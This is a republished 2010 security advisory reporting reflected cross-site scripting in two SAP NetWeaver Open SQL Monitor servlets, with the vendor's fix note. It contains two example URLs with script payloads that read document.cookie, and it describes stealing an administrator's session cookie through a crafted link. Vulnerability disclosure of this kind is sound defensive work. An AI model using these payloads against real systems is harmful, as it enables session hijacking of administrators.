SAP NetWeaver Administrator Panel ECC 6.0 Cross Site Scripting

2010-11-17T00:00:00
ID PACKETSTORM:95915
Type packetstorm
Reporter Sh2kerr
Modified 2010-11-17T00:00:00

Description

                                        
                                            `Digital Security Research Group [DSecRG] Advisory  
  
  
Application: SAP NetWeaver Administrator panel  
Versions Affected: SAP NetWeaver Administrator panel from ECC 6.0  
Vendor URL: http://SAP.com  
Bugs: XSS  
Exploits: YES  
Reported: 07.09.2009  
Vendor response: 08.09.2009  
Date of Public Advisory: 09.11.2010  
CVE-number:  
Author: a.polyakov and a.troshichev from Digital Security Research  
Group [DSecRG] (research [at] dsec [dot] ru)  
  
  
Description  
***********  
  
Open SQL Monitors (installed by default in port 50100) has linked multiple  
XSS vulnerabilies.  
  
  
  
Details  
*******  
  
1 Vulnerable script - ConnectionMonitorServlet  
  
Vulnerable parameters: connid.  
  
Attacker can send link to administrator and get his cookie.  
  
  
2 Vulnerable script - CatalogBufferMonitorServlet  
  
Vulnerable parameters: reqTableColumns  
  
Attacker can send link to administrator and get his cookie.  
  
  
  
Example:  
********  
  
http://172.16.0.222:50100/OpenSQLMonitors/servlet/ConnectionMonitorServlet?view=stmtpool&node=12924950&ds=SAPSR3DB&connid  
=com.sap.sql.jdbc.direct.DirectPooledConnection@1ed00a7<script>alert(document.cookie)</script>  
  
Example:  
********  
  
http://172.16.0.222:50100/OpenSQLMonitors/servlet/CatalogBufferMonitorServlet?action=btnSHOW_COLUMNS&reqNode=12924950&reqBufferId=  
SAPSERVER:dm0:SAPSR3DB&reqTableColumns=BC_RPROF_PROFILE<script>alert(document.cookie)</script>  
  
  
References  
**********  
  
http://dsecrg.com/pages/vul/show.php?id=156  
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a  
https://service.sap.com/sap/support/notes/1391770  
  
  
  
  
Fix Information  
***************  
  
Solution for this issue given in security note 1391770.  
  
  
  
  
About  
*****  
  
Digital Security is one of the leading IT security companies in CEMEA,  
providing information security consulting, audit and penetration  
testing services, ERP and SAP security assessment, certification for ISO/IEC  
27001:2005 and PCI DSS and PA DSS standards.  
Digital Security Research Group focuses on enterprise application (ERP) and  
database  
security problems with vulnerability reports, advisories and whitepapers  
posted regularly on our website.  
  
Contact: research [at] dsecrg [dot]com  
http://www.dsecrg.com  
http://www.erpscan.com  
`